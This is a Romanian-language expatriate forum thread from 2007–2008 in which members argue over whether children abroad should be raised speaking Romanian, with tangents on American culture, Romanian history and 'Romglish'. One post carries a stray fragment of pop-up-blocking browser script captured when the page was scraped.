Apropo de facultate - 26$ pe credit nu este scump smileys/smiley2.gif plus ca o sa-i incurajez sa-si ia un part time jobsmileys/smiley1.gif

E f. clar, consumerismul rulz in USofA, la fel cum lichelismul manelistrulz in RO (si in alte tari, dar am luat RO ca putem vorbi la concret).

Si alcoolismul smileys/smiley2.gif

Shogunelu' - asta inseamna cultura americana pentru tine - hamburgeri, muzica country si filme cu Rambo? smileys/smiley36.gif

Cati americani a-ti cunoscut, fratilor? smileys/smiley36.gif

P.S. cu ungurii n-am incurcat borcanele - am prieteni unguri si ei mi-au spus ce s-a intamplat smileys/smiley2.gif

hazel
27.07.2007, 08:00
Raven si cu Anda au doua su' di mii di bile albe de la mine azi.

Intotdeauna am apreciat o cale de mijloc, care de multe ori e egala cu obiectivitate si pentru mine asta e bunul simt. Mai ales cand e vorba de romani traitori in afara. Ma bucur ca sunt oameni, si cei mai multi cu care am avut contact asa sunt, care gandesc ca mine. In cea mai mare parte a timpului am incredere ca mi-am pastrat mintea si bunul simt intregi, ma bucur insa cand mai scrie cate unul care imi confirma ca sunt inca sanatoasa la cap. Daca arunci cu pietre in locul unde ti-ai ales sa traiesti si refuzi sa vezi si lucrurile bune te otravesti in continuu pe tine insuti si in multe cazuri otravesti atmosfera si pe cei din jur, pentru ca incerci sa impui si celorlalti sa gandeasca la fel ca tine. Anyway, is their problem, not ours.

Shogunelu, deci in opinia ta cei care sunt de multa vreme au bunul simt afectat. Eu as spune ca sunt unii veniti de curand care sunt afectati de lipsa de toleranta atat pacatoasa si gaunoasa din Romania.

Oricum, discutia a alunecat de la "ce limba vorbesc copiii nostri" la ce tampiti si idioti sunt americanii. Jalnic.

shogunelu
27.07.2007, 08:09
Faza este urmatoarea - tu si Shogunelul aveti idei preconcepute, si pe mine ma oboseste sa vad ca inca ganditi romaneste, dupa o perioada traita in US...

Gandim romaneste?Au,mama!!!Saru'mana mult!Nici nu vreau sa gandesc altfel!M-ai facut fericit pe ziua de azi!

AndaF
27.07.2007, 09:30
Multumesc Hazel smileys/smiley4.gif

Sogunelu'... inca ai prejudecati... ( in sensul negativ)la asta am facut referire - daca esti multumit cu asta, este treaba ta...

Pentru mine un motto de viata... ma rog, sunt mai multe :

- fii bun cu ceilalti - tii se va intoarce inzecit

- nu judeca pe nimeni, pana cand n-ai fost in situatia respectiva ( try walking in MY shoes)

n-are sens sa le insir eu aici sau sa incep sa filozofez - eu nu vreau sa schimb pe nimeni smileys/smiley2.gif ideea este - voi puteti sa-i acceptati pe cei care sunt diferiti de voi?

shogunelu
27.07.2007, 09:44
Sigur ca am prejudecati,AndaF,toti avem.

Eu ii accept pe cei cu alte pareri,problema e ca atunci cand incep sa le zic asa,pe sleau,nu ma mai accepta ei pe mine,he,he,he!

Raven
27.07.2007, 09:48
Spiritualitatea unei natii transcede oranduiri sociale,regimuri,guverne,etc.Daca tu esti mai aproape de big mac decat de spiritualitatea tarii tale,macar nu le pune alaturi,ca nu se cade.Probabil ca deja esti de prea mult timp aici,lucru care afecteaza obiectivitatea si bunul simt al oricui.
Coane, poate te-ai incins prea mult, se mai intampla, da' de cele mai multe ori nu se merita.

Mi-ar placea sa nu te-avanti in probabilistica ca sa nu te faci de ras ca nu se merita.

Spiritualitatea unei natii transcende etc. Transcende nimic. Cand unii ca Tutea sau Steinhardt sau Gyr si multi altii au trecut prin ce-au trecut (GULAG si pe urma in "libertatea" democratiei populare sub constanta supraveghere a securitatii poporului si informatorilor conecsi), despre ce spiritualitate vorbesti? Despre Rebreanu care s-a sinucis (vezi ca asta nu scrie prin manuale) la intrarea rusilor in Bucuresti, 1/9/'44? Despre pasoptisti si Eminescu? Ce viata au avut ei in Romania sec. XIX?

Bai, Romania moderna a facut-o Carol I, un aristocrat nemtesc mai patriot decat majoritatea romanilor neaosi. Si Ferdinand I, altul pe linia nemteasca a reusit sa aduca Romania la forma ei naturala, rotunda. Toate astea irosite cu nonsalanta de regimurile de politicieni nevertebrati si impotenti care au dat fugutza sa-l puna pe depravatul de carol II (cu litera mica, nu merita altceva) care in 10 ani a adus Romania la starea de desen animat. Iar pe urma, o buna parte a elitelor culturale (v. Sadoveanu, Arghezi, Graur, Parhon, Stere etc.) si-au dat adeziunea regimului reperist si-au scris muncitoreste si neabatut despre realizarile regimului, colectivizare si altele asemenea.

Ce e Sadoveanu? Fratii Jderi sau Mitrea Cocor? Scriitor de marca sau laureat al ordinului Lenin (pentru pace)?

Asa inainte sa vorbim de spiritualitatea si cultura romaneasca cred ca e bine sa reflectam intai la cum sta treaba cu spiritul mioritic.

Asa ca pana ce cultura romana contemporana nu va mai fi reprezentata de farisei precum troica Liiceanu-Patapievici-Plesu, isi merita exact locul de langa big macul expirat.

Pentru mine spiritul romanesc sunt aia din Memorialul Durerii si de la Dalles si Universitate din '89-'90.

shogunelu
27.07.2007, 09:58
Pentru mine spiritul romanesc sunt aia din Memorialul Durerii si de la Dalles si Universitate din '89-'90.

I-auzi!Dar cei din fata Comitetului Central,sau de la Spitalul Judetean Brasov,intra si ei in categoria ta?

mitch
27.07.2007, 14:05
sa revenim la .... oile noaste'. smileys/smiley1.gif

folosirea limbii romane si educarea copiilor sa vorbeasca romaneste(chiar a celor din casatorii mixte), e o chestiune personala. ma uit la partea plina apaharuluisi raman la convingerea ca natia romanaposeda repere spirituale solide. metrica deal-vale, deal-vale, sau sau hazul de necaz pt mine sunt vitale. din punctul asta de vedere ma simt ok, ba chiar mandru ca-s roman! pe de alta parte mi se par nepotrivite si neproductive comparatiile intre USA siRomania sima repet:pt mine sunt complementare.

Raven m-ai intrebat ce-as face daca maine ar tbsa depun juramantul pt cetatenia americana. Intamplator maine merg la amprentare,smileys/smiley1.gif deci mai e muuuult pana departe.Din pozitia actuala sincer nu vad motive serioase sa aplic pt citizen. Daca ma vor lasa sa vin si sa plec ca si resident pt mine e de-ajuns. Daca m-ar obliga sa renunt la cetatenia romana, raspunsul ar fi NU! Vizavi de regalitate da, Moldova si Tara Romaneasca datoreaza multe, Ardealul mai putin, si ar fimai multe de spus dar divagam de la subiect.

@AndaF spui ceva de "....gandire limitata, idei preconcepute, ...."in fine e ceva cam tulbure, confuzn-am inteles, dezvolta ideea daca e important si ne ... limpezim.smileys/smiley4.gif

Am intalnit diversi americani, dar ............ suntem out of topic.

Raven
28.07.2007, 09:08
I-auzi!Dar cei din fata Comitetului Central,sau de la Spitalul Judetean Brasov,intra si ei in categoria ta?
Nu e nevoie sa intre pentru ca sunt deja acolo, in categoria aia a mea si-a altora.

shogunelu
28.07.2007, 17:57
Nu e nevoie sa intre pentru ca sunt deja acolo, in categoria aia a mea si-a altora.

E,atunci m-am mai linistit,nu de alta,dar intamplator am fost acolo din prima si pana in ultima clipa,cu mainile goale si apoi cu arma in mana.

Raven
29.07.2007, 06:53
E,atunci m-am mai linistit,nu de alta,dar intamplator am fost acolo din prima si pana in ultima clipa,cu mainile goale si apoi cu arma in mana.
Coane, n-ai fost intamplator acolo. Unii mai au constiinta si actioneaza ca atare. "Unii" astia sunt o specie pe cale de disparitie.

Faptul ca vorbesti romaneste despre asta spune multe. Si bune.
Si cand zic "vorbesti" nu ma refer numai la cuvinte rostite sau scrise.

PS: Sunt convins ca l-ai folosit pe "intamplator" ca figura de stil.

shogunelu
29.07.2007, 07:26
Ai sesizat bine,Raven,"intamplator" este doar o figura de stil.Acolo nu puteai fi decat din proprie vointa si din convigerea sinceraca daca n-ai fi fost,n-ai mai fi putut trai cu tine.

Raven
29.07.2007, 08:20
"daca n-ai fi fost,n-ai mai fi putut trai cu tine"

Asta merge de motto.

Ai pus punctul pe i si virgula sub tzi.

Si nu e off-topic. Chestia asta din citat e cam greu de spus in engleza fara a se pierde ceva din esenta ei.

Problema asta, ca e o problema, a comutarii intre comunicarea in romana si cea in engleza afecteaza pe toti imigrantii si este inevitabila. Nu merge ca la DVD cu language selection.

Problema asta cu romana-engleza si de la cap este parte din conditia emigratiei romane, o problema care nu se manifesta de la bun inceput, ci isi face simtita prezenta treptat, in timp, o problema invizibila pentru proaspetii emigranti, caci nu este constientizata de a inceput.

PS: Am luat in discutie aici cazul romana-engleza pentru ca topicul e pe marginea comunicarii in romana/engleza. Problema insa este generalizata la nivelul intregii diasporei romanesti si numai a emigratiei romane din tarile anglo-saxone.

angela
02.08.2007, 01:11
Mitch nu te va obliga nimeni sa renuntzi la cetatenia romana, ai voie sa ai doua cetatenii, totul consta ca atunci cand depui juramantul este faptul ca trebuie sa iei partea americanilor. Daca vreodata se va intampla ca Romania sa fie in razboi cu Statele Unite tu trebuie sa fii de partea americanilor si sa le oferi tot sprijinul. Nu cred ca se va intampla asa ceva vreodata dar asta e toata chestia cand depui juramantul. < =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

Ana Stabell
02.09.2007, 01:59
Buna Angela!

Dragii mei cu toate ca am o tona de zis cand vine vb de acest topic sunt inca in shoc ca nu a-ti observat ce se "petrece" sub nasul nostru acilea pe forum...Vizionare placuta...smileys/smiley19.gif

http://www.romanian-portal.com/forum/forum_posts.asp?TID=967 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=9672&amp;PN=1&amp;TPN=8) 2&amp;PN=1&amp;TPN=8

P.S. pagina 8 e preferata mea nu pt ca acolo apar postarile mele ci pt ca ametesc decate ori incerc sa o citesc smileys/smiley118.gif

02.09.2007, 18:28
P.S. pagina 8 e preferata mea nu pt ca acolo apar postarile mele ci pt ca ametesc decate ori incerc sa o citesc http://www.romanian-portal.com/forum/smileys/smiley118.gif

Draga Claudiu....M_A LUAT BOALA DE LA PRIMA MELODIE!!!http://www.romanian-portal.com/forum/smileys/smiley93.gif

Cred ca ti se trage de la melodia aiasmileys/smiley36.gif

fifi
02.09.2007, 23:20
Buna Angela!

Dragii mei cu toate ca am o tona de zis cand vine vb de acest topic sunt inca in shoc ca nu a-ti observat ce se "petrece" sub nasul nostru acilea pe forum...Vizionare placuta...smileys/smiley19.gif

http://www.romanian-portal.com/forum/forum_posts.asp?TID=967 2&amp;PN=1&amp;TPN=8 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=9672&amp;PN=1&amp;TPN=8)

P.S. pagina 8 e preferata mea nu pt ca acolo apar postarile mele ci pt ca ametesc decate ori incerc sa o citesc smileys/smiley118.gif

Stimata Doamna Ana Stabella,

Daca dumneavoastra aveti de spus "o tona" imi permit si eu sa spun cateva cuvinte in legatura cu limbile folosite. Eu cred ca nu conteaza ce limba vorbim atata timp cat o folosim corect. De exemplu, dumneavoastra v-as recomada sa faceti o incercare si cu engleza pt ca exprimarea dumneavoastra in limba romana greoaie si plina de greseli de ortografie face si pietrele sa planga.

cat despre felul cum aduceti aici in discutie acel topic, nu pot sa va spun decat ca ma duce cu gandul la vechea zicala: Cainele moare de alergatura si"desteptul" de grija altuia. Vorbind acum despre interventia dumneavoastra pe acel topic, de care sunteti atat de mandra mie una mi s-a parut mai ceva nelalocul ei decat o nuca in perete. Probabil si altora, pentru ca ati cam fost ignorata pentru vorbele de duh scrise pe acolo.

caci, vorba ceea, De unde nu e, nici Dumnezeu nu cere!

Ana Stabell
03.09.2007, 06:38
claudiu: lol

fifilitza draga,

nu cred ca te-am injurat de mama sa dai cu oua in mine la modu asta. dupa ce am citit mesajul plin de dragoste lasat de matalemi-au cam trecut cateva prin minte. singurul motiv pt care am "adus vorba" de acel topic este faptul ca muti romanasi ca matale sunt foarte traditionalishti si patrioti din alte tari, in timp ce pe acelasi web-site exista un topic unde libma folosita sare de la una la alta si de la o forma de scriere la alta - rogleza mai precis.

si daca tot iti plac zicalele imi vine si mie una in minte cand ma uit la cum ai reactionat la mesaju meu: daca te amesteci cu taratele te mananca porcii. iti doresc o viata fericita siplina de oameni ca tine.

numai bine,

Ana Stabell fara a la sfarsit - pt ipocriti

smileys/smiley20.gif

shogunelu
03.09.2007, 07:08
Eu cred ca putem foarte bine sa vorbim si romana si engleza,dar nu mai vorbiti rogleza,ca am impresia ca nu realizati cat de stupid suna.

03.09.2007, 09:36
singurul motiv pt care am "adus vorba" de acel topic este faptul ca muti romanasi ca matale sunt foarte traditionalishti si patrioti din alte tari, in timp ce pe acelasi web-site exista un topic unde libma folosita sare de la una la alta si de la o forma de scriere la alta - rogleza mai precis.
asa si care-i problema?..de-aia nu-ti mai creste tie Alexander? smileys/smiley36.gif Si mie mi se pare aiurea rogleza si mai pic si eu in "pacat" in scris... foarte rar in vorbire...insa.. traieste si lasa sa traiasca..what se pare to be problema?smileys/smiley36.gif oricum ai grija cu drogurile ca aia n-a fost funnysmileys/smiley4.gif

fifi
03.09.2007, 23:06
Ana, nu stiu de unde deduci tu ca dau eu cu oua? Adica tu faci observatii si te bagi ca musca in oala altora dar tie sa nu-ti spuna nimeni nimic? smileys/smiley18.gif

multumesc pt ca m-ai facut ipocrita numai pt ca am adaugat un a la sfarstitul numelui tau ca sa fac un spirit de gluma, o rima, ce e rau in cuvantul "bella", poate ca tu cum esti inca instarea de "shoc" cine stie la ce ti-a zburat mintea dar eu stiam ca inseamna "cea frumoasa".

Zicala ta nu am priceput-o prea bine in contexul de fata, adica eu am priceput-o cam asa: Copiii aia tineri si frumosi, veseli si plini de viata se simteau bine glumind intre ei, nu au suparat pe nimeni cu topicul lor, ne-au primit chiar si pe noi sa glumim cu ei dar pt ca noi avem obrazul mai gros si nu avem loc de fericirea si bucuria lor, ce ne gandim, hai sa-i mancam si sa terminam cu ei.

Felicitari, Ana Stabell, uite ca indignarea ta a dat roade si au inchis topicul, in felul asta poate o sa ai mai multa liniste cand dai merele pruncului tau pe razatoare. smileys/smiley11.gif

ps. am uitat, care suntemmai ipocriti Ana?! cu Claudiu te lol uiesti pe aci si ranjesti toata, de el iti place, tu cu ea ai ce ai, drept ex si afirmatia ta cum ca ar folosi droguri, e mult prea finuta fata aia ca meritai un raport pt ce ti-a iesit din gura...

03.09.2007, 23:27
fifi draga, sa stii ca sint persoane care chiar daca nu au participat la discutiile de pe topicul cu pricina,au avut un zimbet de multumire cind tineri frumosi si veseli,au comunicat civilizat fara a deranja pe nimeni.Este putin important faptul ca s-a folosit o limba sau alta,sau amindoua combinate,important este ca voi v-ati inteles.Cred ca atit in viata reala cit si in cea virtuala,cel inteligent,cedeaza.Asa ca "lascia perdere"(pentru ca exista si o limba romanit)Hai sa intru si eu in gura lupului !

04.09.2007, 13:19
Asa ca "lascia perdere"(pentru ca exista si o limba romanit</span>)Hai sa intru si eu in gura lupului !

lupul catre scufita rosie : limba de care vorbesti se numeste rotaliana</span> iar "parintele spiritual" - Florin Raducioiu
</span>
</span></span>..parca

04.09.2007, 20:08
Lupule,chiar daca ai tendinta sa ma maninci,o fi Florin Raducioiu,parintele spiritual al rotalianei,dar nu vorbeste in locul meu si nici eu in locul lui.Asa ca "lascia perdere"

04.09.2007, 20:36
Pt ce-a facut in '94 pt noi, Florin Raducioiu poate sa vorbeasca cum vrea el..la fel si colegii lui ...noi trebuie doar sa-i respectam.smileys/smiley2.gif

04.09.2007, 20:45
Claudiu,intentia mea era de a glumi pe fondul discutiei legate de modul de a vorbi romaneste(scrie).Pentru mine Florin Raducioiu,si oricare alt antrenor sau fotbalist din Ro sau alte state,sint un teren necunoscut.De aceea-i respect pe toti.Dar mai mult si mai mult respect situatia lor financiara.(tot o gluma)

04.09.2007, 20:57
Elliane nu ma intelege gresit ca nu te-am acuzat pe tine de ceva. Era numai o idee..mult popor radea de Raducioiu la vremea aia in timp ce el ne scotea in strada,era un fel de moda pe care dupa cum vezi unii si-o mai amintesc inca. Dar vorbea cum putea si el, in meseria lui era mai putin important. Mai putine vorbe si mai multe fapte nu ca-n zilele noastre.

hazel
05.09.2007, 15:41
Buna Angela!

http://www.romanian-portal.com/forum/forum_posts.asp?TID=967 2&amp;PN=1&amp;TPN=8

ANa, am dat click pe linkul furnizat de tine si surpriza, am participat si eu acolo! smileys/smiley36.gifSi cu mare placere.

Angie a fost o gazda draguta, subtila, cu simtul umorului si eu personal am comunicat cu placere cu cei de pe acel topic. Acum ai facut-o sa ceara inchiderea topicului, pacat. Sunt convinsa ca chiarsi tie iti pare rau.

geani_23
11.09.2007, 04:40
Revenind la ideea initiala a topicului.....cunosc familii de romani care din prostie sau mandrie (crezandu-se americani) vorbesc numai engleza iar copilul binenteles ca nu va stii o boaba romana.

Pe de alta parte cunosc un baiat de 18 ani care a venit cu mama lui in State de la 5 ani. Si acum vorbeste romana, cu accent american bineneteles. Bravo lui, exemplu pt parintii care cred ca nu se poate!

genu
04.10.2007, 12:51
....Cred ca atunci cand suntem in antuaj numai cu romani TREBUIE SA NE FACA O DEOSEBITA PLACERE sa vorbim ROMANESTE.

placere?

vorbim pt ca asta e limba pe care o stim ,in care ne-am nascut,marea majoritate.

koolro.com
04.10.2007, 21:33
nu stiu la voi dar la mine in casa se vorbeste romaneste, germana si engleza :))) nu mai intelegi nimic, cred ca un copil nici atat :)))))

revenind la subiect, sint de acord ca, copii sa invete prima data limba nativa a parintilor pentru ca engleza o sa fie usoara pt ei cand merg la pre-school sau school :)) uite ca le-am amestecat si eu :)))))

FidelKatzo
25.04.2008, 04:29
Am intalnit ieri o cunostinta si am discutat despre copii..Femeia are o fetita de doi ani si cateva luni si mi-a povestit ca de la varsta de un an ,adica de cand a inceput sa faca primii pasi ,a participat cu ea la o grupa de copii de aceeasi varsta,cam o data la saptamanna,in scopul de a pregati copiii pentru viata sociala..Totul era contra cost, organizatoarea acestor intalniri avea un loc inchiriat la marginea orasului unde copiii puteau sa se miste in voie..si binenteles se incercau si activitati in grup..Personal nu m-a incantat in mod deosebit ideea, pentru-ca dupa parerea mea un copil este prea mic la varsta de un an sa-l inveti ce este disciplina..Ei bine,asta a fost...Cam de o luna de zile participa la o grupa de copii,unde participa copii intre varstele de 2 si pana la 5 ani..Grupa a fost formata la initiativa unei romance cu scopul de a obisnui copiii sa vorbeasca romaneste intre ei..Cunostinta mea a aflat intamplator dintr.un ziar local(limba germana)de existenta acestei grupe..Intalnirea are loc in incinta unei biserici catolice si din cate am inteles sant foarte multi participanti..Deci se poate..,numai sa vrem..